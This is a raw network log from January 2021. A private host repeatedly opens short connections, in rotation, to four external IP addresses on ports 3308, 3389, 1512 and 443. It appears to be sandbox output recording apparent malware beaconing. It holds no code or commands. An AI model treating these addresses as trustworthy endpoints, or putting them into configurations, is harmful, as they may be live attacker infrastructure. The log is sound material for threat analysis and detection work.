Jan 12, 2021 07:44:44.211752892 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:44.217406034 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:44.261915922 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:44.334502935 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.388565063 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.388675928 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.390248060 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.444426060 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.465253115 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.465291023 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.465348959 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.465367079 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.479396105 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.544225931 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.544435024 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.553688049 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.553750992 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.607973099 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.608186007 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.647866011 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.662209034 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.662249088 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.752278090 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.752321005 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.752480984 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.758258104 CET	49298	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:44.812299967 CET	3389	49298	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:44.882838964 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:44.935837030 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:44.937131882 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:44.937460899 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:44.990252972 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:44.997270107 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:44.997301102 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:44.997349977 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:44.997384071 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:45.014084101 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:45.068031073 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:45.068279028 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:45.077635050 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:45.077924013 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:45.130831957 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:45.131105900 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:45.169689894 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:45.184268951 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:45.286102057 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:45.286144018 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:45.286375046 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:45.292180061 CET	49299	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:45.345058918 CET	1512	49299	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:45.410993099 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.463437080 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.463601112 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.465490103 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.517843962 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.532656908 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.532839060 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.548614979 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.603234053 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.603396893 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.610692978 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.610981941 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.663193941 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.663348913 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.702862978 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.715742111 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.833961964 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.834002972 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.834170103 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.839225054 CET	49300	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:45.891520977 CET	443	49300	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:45.956123114 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:45.999574900 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:45.999751091 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.001530886 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.044831038 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.055335045 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.055368900 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.055424929 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.055465937 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.072089911 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.119745970 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.119987011 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.130208015 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.130619049 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.174042940 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.174144030 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.213505030 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.218975067 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.219017982 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.330576897 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.330615044 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.330765963 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.336594105 CET	49301	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:46.379962921 CET	3308	49301	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:46.456397057 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.511061907 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.511184931 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.512989998 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.567449093 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.588989973 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.589025974 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.589090109 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.589134932 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.600214958 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.661488056 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.662039995 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.667697906 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.667768002 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.722520113 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.722726107 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.762098074 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.777784109 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.777823925 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.867460966 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.867497921 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.867743969 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.870831966 CET	49302	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:46.926201105 CET	3389	49302	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:46.986984968 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.040765047 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.040868998 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.042432070 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.095448017 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.102490902 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.102545023 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.102586985 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.102632999 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.119183064 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.173572063 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.173912048 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.190717936 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.190880060 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.244020939 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.244211912 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.281820059 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.297322035 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.297359943 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.395875931 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.395929098 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.396214962 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.402182102 CET	49303	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:47.455388069 CET	1512	49303	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:47.517318010 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.569565058 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.569673061 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.571341991 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.623378038 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.638113976 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.638221979 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.656152010 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.710694075 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.711103916 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.717856884 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.718017101 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.770147085 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.770185947 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.774087906 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.826314926 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.826356888 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.946515083 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.946548939 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:47.946600914 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.946649075 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:47.949451923 CET	49304	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:48.001465082 CET	443	49304	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:48.058697939 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.101789951 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.101959944 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.103395939 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.147434950 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.162267923 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.162311077 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.162395000 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.162452936 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.177500963 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.223103046 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.223195076 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.233006001 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.233407021 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.276503086 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.276602983 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.316802025 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.319932938 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.319973946 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.432538033 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.432595968 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.432826042 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.438497066 CET	49305	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:48.481746912 CET	3308	49305	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:48.562417984 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.616424084 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.616753101 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.618217945 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.673079014 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.688060999 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.688102007 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.688186884 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.688266039 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.700262070 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.760869980 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.761190891 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.770620108 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.770725965 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.825141907 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.825284004 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.864957094 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.880224943 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.880265951 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.968734026 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.968780041 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:48.969048023 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:48.974762917 CET	49306	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:49.029644966 CET	3389	49306	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:49.092735052 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.145881891 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.145960093 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.146938086 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.199904919 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.206871986 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.206917048 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.206978083 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.207016945 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.223556042 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.277976036 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.278361082 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.288877964 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.289128065 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.342068911 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.342304945 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.381835938 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.395384073 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.395425081 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.495963097 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.496009111 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.496356964 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.502036095 CET	49307	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:49.555164099 CET	1512	49307	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:49.623553038 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.675677061 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:49.675882101 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.677484035 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.729588032 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:49.744573116 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:49.744654894 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.754509926 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.809118986 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:49.809340000 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.818763018 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.818929911 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.871267080 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:49.871419907 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:49.925606012 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:50.042493105 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:50.042552948 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:50.042701960 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:50.048403025 CET	49308	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:50.100392103 CET	443	49308	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:50.169291973 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.213221073 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.213323116 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.214799881 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.257940054 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.268590927 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.268642902 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.268686056 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.268728971 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.277070999 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.322069883 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.322148085 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.329803944 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.329926014 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.373157978 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.373244047 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.412848949 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.416471004 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.416517019 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.530028105 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.530102015 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.530394077 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.533061981 CET	49309	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:50.576293945 CET	3308	49309	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:50.653040886 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.707190037 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:50.707294941 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.708843946 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.762866020 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:50.782404900 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:50.782486916 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:50.782520056 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.782572031 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.792592049 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.851929903 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:50.852118015 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.863223076 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.863337040 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.917305946 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:50.917488098 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:50.956738949 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:50.971432924 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:50.971451998 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:51.060801983 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:51.060852051 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:51.061134100 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:51.066883087 CET	49310	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:51.121612072 CET	3389	49310	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:51.186306000 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.239145994 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.239286900 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.240576982 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.293356895 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.300215960 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.300235987 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.300324917 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.317051888 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.371009111 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.371117115 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.380762100 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.381021023 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.433898926 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.434000015 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.473584890 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.486725092 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.587766886 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.587811947 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.588040113 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.593781948 CET	49311	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:51.646821976 CET	1512	49311	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:51.711117029 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.763377905 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:51.763561010 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.764453888 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.816606998 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:51.831463099 CET	443	49312	77.220.64.37	192.168.2.22
